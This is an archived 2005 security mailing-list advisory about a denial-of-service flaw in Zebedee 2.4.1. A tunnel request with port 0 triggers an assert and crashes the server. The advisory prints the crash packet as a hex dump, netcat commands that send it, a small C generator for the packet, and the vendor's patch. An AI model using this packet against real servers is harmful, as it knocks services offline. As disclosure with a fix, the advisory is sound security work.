[NEWS] Zebedee DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 09/13/05

  • Next message: SecuriTeam: "[NT] Ipswitch Whatsup Multiple Vulnerabilities" 
    To: list@securiteam.com
Date: 13 Sep 2005 16:04:58 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Zebedee DoS
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.winton.org.uk/zebedee/> Zebedee is a simple program to
    establish an encrypted, compressed tunnel for TCP/IP or UDP data
    transfer between two systems." Lack of proper validation of the user
    provided port range allows attackers to cause the Zebedee program to
    crash.

    DETAILS

    Vulnerable Systems:
     * Zebedee version 2.4.1

    Immune Systems:
     * Zebedee version 2.4.1a

    The server crashes whenever "0" received as the port number in the
    protocol option header.

    $ od -tx1z -Ax zebedeeDoS
    000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
    000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
    00001c

    The 9th and 10th byte of the header contains 0x00.

    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 0, rcvd 0

    $ nc -vv zebedeehost 11965 < zebedeeDoS
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 28, rcvd 2

    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
     sent 0, rcvd 0

    $

    In the zebedee.c, look at the function makeConnection() which called from
    server(),

       1703 /* Sanity check */
       1704
       1705 assert(host != NULL && port != 0);
       1706

    Here, if the port number is "0", both sub and parent processes seemed to
    quit running.

    This issue occurs when the "allowed redirection port" not set(in default).

    Vendor Patch:
    *** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
    --- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
    ***************
    *** 22,28 ****
      */
      
      char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
    ndwinton Exp $";
    ! #define RELEASE_STR "2.4.1"
      
      #include <stdio.h>
      #include <stdlib.h>
    --- 22,28 ----
      */
      
      char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
    ndwinton Exp $";
    ! #define RELEASE_STR "2.4.1A"
      
      #include <stdio.h>
      #include <stdlib.h>
    ***************
    *** 3936,3941 ****
    --- 3936,3950 ----
          assert(AllowedTargets != NULL);
      
          /*
    + ** Port 0 is invalid data in the request packet, never allowed
    + */
    + if (port == 0)
    + {
    + message(0, 0, "request for target port 0 disallowed");
    + return 0;
    + }
    +
    + /*
          ** If the address is all zeroes then we will assume the default
    target
          ** host, if any.
          */

    Workaround:
    Setting up allowed redirection ports will address this issue.

    Exploit:
    /*
            $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
            $ ./mkZebedeeDoS > zebedeeDoS
            $ nc targethost port < zebedeeDoS
    */

    #include <stdio.h>

    int main (int argc, char **argv)
    {
            int i, size;

            char data[] = {
            0x02, 0x01, // protocol version
            0x00, 0x00, // flags
            0x20, 0x00, // max message size
            0x00, 0x06, // compression info
            0x00, 0x00, // port request: value = 0x0
            0x00, 0x80, // key length
            0xff, 0xff, 0xff, 0xff, // key token
            0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
            0x00, 0x00, 0x00, 0x00 // target host address
             };

            size = 28;
            for(i=0; i<size; i++){
                    printf("%c", data[i]);
            }

            return 0;

    }

    /* EoF */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:shiraishi@insi.co.jp>
    Shiraishi.M.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Ipswitch Whatsup Multiple Vulnerabilities"

    Relevant Pages